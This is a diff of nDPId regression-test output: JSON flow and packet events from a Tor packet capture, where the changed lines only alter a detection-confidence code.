00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1843,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1383822129951,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383822129951,"pkt":"UlQA2EYhUlQAWul3CABFAAAoCJlAAIAGv0TAqAH81FOb+sfmAbsbVwNnrWI9fVAQAQCoogAAAAAAAAAA"} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1844,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1383822129961,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822129961,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAAC4G0J5bj13ywKgB\/AG7x+fD3pw1Z7sOzYASOQgZlAAAAgQFtAEBBAIBAwMH"} 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1845,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1383822129962,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383822129962,"pkt":"UlQA2EYhUlQAWul3CABFAAAoCJpAAIAGdhDAqAH8W49d8sfnAbtnuw7Nw96cNlAQAQCSbgAAAAAAAAAA"} -00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1846,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822129889,"flow_last_seen":1383822129965,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1383822129965,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.t3i3ru.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01183{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1847,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822129897,"flow_last_seen":1383822129972,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1383822129972,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.gfu7hbxpfp.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01146{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1849,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822129889,"flow_last_seen":1383822130023,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":743,"flow_tot_l4_payload_len":952,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1383822130023,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.t3i3ru.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.wohgpas45j6ucw.com","subjectDN":"CN=www.7d43ah2kikrabj.net","fingerprint":"F9:1D:5F:89:8F:D8:58:1E:45:E7:9B:A6:FD:90:95:77:FF:DD:E8:1B"}} -01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1852,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822129897,"flow_last_seen":1383822130047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":748,"flow_tot_l4_payload_len":961,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1383822130047,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.gfu7hbxpfp.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.xkgk7fdx362yyyxib.com","subjectDN":"CN=www.g6ghvisevf3ibuu5.net","fingerprint":"94:F9:FF:E2:7F:DB:1F:B8:19:65:20:6F:F6:DE:B6:A5:D5:AF:14:C7"}} +00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1846,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822129889,"flow_last_seen":1383822129965,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1383822129965,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.t3i3ru.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01183{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1847,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822129897,"flow_last_seen":1383822129972,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1383822129972,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.gfu7hbxpfp.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01146{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1849,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822129889,"flow_last_seen":1383822130023,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":743,"flow_tot_l4_payload_len":952,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1383822130023,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.t3i3ru.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.wohgpas45j6ucw.com","subjectDN":"CN=www.7d43ah2kikrabj.net","fingerprint":"F9:1D:5F:89:8F:D8:58:1E:45:E7:9B:A6:FD:90:95:77:FF:DD:E8:1B"}} +01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1852,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822129897,"flow_last_seen":1383822130047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":748,"flow_tot_l4_payload_len":961,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1383822130047,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.gfu7hbxpfp.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.xkgk7fdx362yyyxib.com","subjectDN":"CN=www.g6ghvisevf3ibuu5.net","fingerprint":"94:F9:FF:E2:7F:DB:1F:B8:19:65:20:6F:F6:DE:B6:A5:D5:AF:14:C7"}} 00180{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1862,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822130216} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1862,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822130168,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1888,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822130889,"flow_last_seen":1383822130889,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383822130889,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1888,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1383822130889,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822130889,"pkt":"UlQA2EYhUlQAWul3CABFAAA0CK1AAIAGwljAqAH8JuVGNcfoAbv0twffAAAAAIACIABZFwAAAgQFtAEDAwgBAQQC"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1891,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1383822131033,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822131033,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAADQGFwYm5UY1wKgB\/AG7x+hg0\/cE9LcH4IASOQjoIwAAAgQFtAEBBAIBAwMK"} 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1892,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1383822131034,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383822131034,"pkt":"UlQA2EYhUlQAWul3CABFAAAoCK9AAIAGwmLAqAH8JuVGNcfoAbv0twfgYNP3BVAQAQBhAQAAAAAAAAAA"} -00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1893,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822130889,"flow_last_seen":1383822131034,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1383822131034,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.jmts2id.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01144{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1896,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822130889,"flow_last_seen":1383822131220,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":929,"flow_tot_l4_payload_len":1139,"flow_avg_l4_payload_len":189,"midstream":0,"thread_ts_msec":1383822131220,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.jmts2id.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"e1691a31bfe345d2692da75636ddfb00","unsafe_cipher":0,"cipher":"TLS_DHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"CN=www.gg562izcxdvqdk.com","subjectDN":"CN=www.fcsyvnlemwxv5p.net","fingerprint":"C1:93:18:2C:A3:1D:AC:5F:C7:DE:17:8A:4E:B1:E8:13:BB:08:73:3A"}} +00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1893,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822130889,"flow_last_seen":1383822131034,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1383822131034,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.jmts2id.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01144{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1896,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822130889,"flow_last_seen":1383822131220,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":929,"flow_tot_l4_payload_len":1139,"flow_avg_l4_payload_len":189,"midstream":0,"thread_ts_msec":1383822131220,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.jmts2id.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"e1691a31bfe345d2692da75636ddfb00","unsafe_cipher":0,"cipher":"TLS_DHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"CN=www.gg562izcxdvqdk.com","subjectDN":"CN=www.fcsyvnlemwxv5p.net","fingerprint":"C1:93:18:2C:A3:1D:AC:5F:C7:DE:17:8A:4E:B1:E8:13:BB:08:73:3A"}} 00180{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1919,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822132212} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1919,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822132203,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":141,"flow_first_seen":1383821665420,"flow_last_seen":1383821774457,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":60720,"flow_avg_l4_payload_len":430,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1383821693159,"flow_last_seen":1383821693159,"flow_idle_time":200000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":141,"flow_first_seen":1383821665420,"flow_last_seen":1383821774457,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":60720,"flow_avg_l4_payload_len":430,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1383821693159,"flow_last_seen":1383821693159,"flow_idle_time":200000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821734359,"flow_last_seen":1383821734359,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"157.56.30.46","src_port":51104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"}} 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821734359,"flow_last_seen":1383821734359,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"157.56.30.46","src_port":51104,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01040{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1383821666407,"flow_last_seen":1383821774461,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9246,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"}} -01046{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1576,"flow_first_seen":1383821668403,"flow_last_seen":1383821774532,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1301150,"flow_avg_l4_payload_len":825,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"}} -00683{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1383821673254,"flow_last_seen":1383822123915,"flow_idle_time":200000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":720,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +01040{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1383821666407,"flow_last_seen":1383821774461,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9246,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"}} +01046{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1576,"flow_first_seen":1383821668403,"flow_last_seen":1383821774532,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1301150,"flow_avg_l4_payload_len":825,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 